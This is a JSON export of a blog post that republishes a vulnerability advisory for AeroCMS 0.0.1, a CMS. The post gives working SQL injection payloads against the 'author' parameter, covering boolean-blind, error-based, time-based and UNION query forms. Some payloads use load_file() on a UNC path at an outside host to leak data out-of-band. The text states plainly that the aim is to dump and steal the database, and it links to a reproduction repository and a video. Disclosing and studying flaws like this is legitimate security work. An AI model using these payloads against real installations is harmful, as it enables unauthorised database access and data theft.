{"id":29779,"date":"2022-08-29T20:28:54","date_gmt":"2022-08-29T16:28:54","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/168189\/aerocms0001-sql.txt"},"modified":"2022-08-30T14:28:07","modified_gmt":"2022-08-30T09:58:07","slug":"aerocms-0-0-1-sql-injection","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/aerocms-0-0-1-sql-injection\/","title":{"rendered":"AeroCMS 0.0.1 SQL Injection"},"content":{"rendered":"<p dir=\"ltr\">## Title: AeroCMS-v0.0.1 SQLi<br \/>\n## Author: nu11secur1ty<br \/>\n## Date: 08.27.2022<br \/>\n## Vendor: https:\/\/github.com\/MegaTKC<br \/>\n## Software: https:\/\/github.com\/MegaTKC\/AeroCMS\/releases\/tag\/v0.0.1<br \/>\n## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/MegaTKC\/2021\/AeroCMS-v0.0.1-SQLi<\/p>\n<p dir=\"ltr\">## Description:<br \/>\nThe `author` parameter from the AeroCMS-v0.0.1 CMS system appears to<br \/>\nbe vulnerable to SQL injection attacks.<br \/>\nThe malicious user can dump-steal the database, from this CMS system<br \/>\nand he can use it for very malicious purposes.<\/p>\n<p dir=\"ltr\">STATUS: HIGH Vulnerability<\/p>\n<p dir=\"ltr\">[+]Payload:<br \/>\n&#8220;`mysql<br \/>\n&#8212;<br \/>\nParameter: author (GET)<br \/>\nType: boolean-based blind<br \/>\nTitle: OR boolean-based blind &#8211; WHERE or HAVING clause<br \/>\nPayload: author=-5045&#8242; OR 8646=8646 AND &#8216;YeVm&#8217;=&#8217;YeVm&amp;p_id=4<\/p>\n<p dir=\"ltr\">Type: error-based<br \/>\nTitle: MySQL &gt;= 5.0 OR error-based &#8211; WHERE, HAVING, ORDER BY or<br \/>\nGROUP BY clause (FLOOR)<br \/>\nPayload: author=admin&#8217;+(select<br \/>\nload_file(&#8216;\\\\\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\\\pvq&#8217;))+&#8221;<br \/>\nOR (SELECT 7539 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT<br \/>\n(ELT(7539=7539,1))),0x7170716b71,FLOOR(RAND(0)*2))x FROM<br \/>\nINFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND &#8216;mwLN&#8217;=&#8217;mwLN&amp;p_id=4<\/p>\n<p dir=\"ltr\">Type: time-based blind<br \/>\nTitle: MySQL &gt;= 5.0.12 AND time-based blind (query SLEEP)<br \/>\nPayload: author=admin&#8217;+(select<br \/>\nload_file(&#8216;\\\\\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\\\pvq&#8217;))+&#8221;<br \/>\nAND (SELECT 6824 FROM (SELECT(SLEEP(5)))QfTF) AND &#8216;zVTI&#8217;=&#8217;zVTI&amp;p_id=4<\/p>\n<p dir=\"ltr\">Type: UNION query<br \/>\nTitle: MySQL UNION query (NULL) &#8211; 10 columns<br \/>\nPayload: author=admin&#8217;+(select<br \/>\nload_file(&#8216;\\\\\\\\7z7rajg38ugkp9dswbo345g0nrtkha518pzcp0e.kufar.com\\\\pvq&#8217;))+&#8221;<br \/>\nUNION ALL SELECT<br \/>\nNULL,NULL,CONCAT(0x717a6a6a71,0x4f617a456c7953617866546b7a666d49434d644662587149734b6d517a4e674d5471615a73616d58,0x7170716b71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&amp;p_id=4<br \/>\n&#8212;<\/p>\n<p dir=\"ltr\">&#8220;`<\/p>\n<p dir=\"ltr\">## Reproduce:<br \/>\n[href](https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/MegaTKC\/2021\/AeroCMS-v0.0.1-SQLi)<\/p>\n<p dir=\"ltr\">## Proof and Exploit:<br \/>\n[href](https:\/\/streamable.com\/ir9bjt)<\/p>\n","protected":false},"excerpt":{"rendered":"<p>## Title: AeroCMS-v0.0.1 SQLi ## Author: nu11secur1ty ## Date: 08.27.2022 ## Vendor: https:\/\/github.com\/MegaTKC ## Software: https:\/\/github.com\/MegaTKC\/AeroCMS\/releases\/tag\/v0.0.1 ## Reference: https:\/\/github.com\/nu11secur1ty\/CVE-nu11secur1ty\/tree\/main\/vendors\/MegaTKC\/2021\/AeroCMS-v0.0.1-SQLi ## Description: The `author` parameter from the AeroCMS-v0.0.1 CMS system appears to be vulnerable to SQL injection attacks. The malicious user can dump-steal the database, from this CMS system and he can use it for very &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-29779","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29779","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=29779"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/29779\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=29779"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=29779"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=29779"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}